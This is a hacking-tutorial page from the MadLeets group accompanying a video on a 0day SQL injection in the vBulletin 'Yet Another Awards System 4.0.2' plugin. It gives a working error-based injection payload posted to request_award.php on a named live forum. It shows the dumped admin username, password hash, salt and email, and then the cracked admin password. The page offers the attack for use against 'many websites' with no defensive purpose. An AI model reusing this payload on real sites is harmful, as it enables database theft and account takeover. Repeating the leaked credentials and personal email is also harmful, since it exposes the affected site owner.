vBulletin Yet Another Awards System 4.0.2 Time Based SQL Injection 0day
iSpeech
Exploit: vBulletin Yet Another Awards System 4.0.2 Time Based SQL Injection 0day
Video By: Shadow008
Video:
What things I used?
1) FireFox
2) Hackbar addon
3) PasswordsPro for Cracking
vBulletin Hash Type:md5(md5($salt).md5($pass))
Text In Video:
[code]
# Assalamu Alaikum and HellO EveryOne !
# In this video, I will be teaching you guys on how to SQL Inject into a vBulletin database from a vulnerable plugin called Yet Another Awards System.
# Many websites are using it, It will work on some sites.
# Lets Start 😀
# Target: http://fpsbunker.com/fodforums/
# Vul Link: http://fpsbunker.com/fodforums/request_award.php
# Click Load URL
And Then Post:
Post: do=submit&name=award_id=2 &award_request_reason=0&award_request_uid=0' and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password,0x3a,salt,0x3a,email) as char),0x7e)) from user where userid=1 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''='#&submit=Submit
# and then hit Execute 😀
Database Error, Check its page source code
MySQL Error : Duplicate entry 'day8249:cf9fc99e21a3bce77358713ffa0cb59c:P@H:ryan@fpsbunker.com~' for key 'group_key'
# Username:day8249
# Hash:cf9fc99e21a3bce77358713ffa0cb59c
# Salt:P@H
# Email:ryan@fpsbunker.com
Lets Crack the admin Hash 😀
# Cracked Password:ryan03
Admin password cracked and is ryan03
Lets try
# Thanks for watching and I hope the video was easy to understand.
# More video tutorials can be found at www.MadLeets.com
# Video By Shadow008
# Greets to All MadLeeTs Team: www.MadLeets.com
Likes: 2
Viewed:
source
Gloss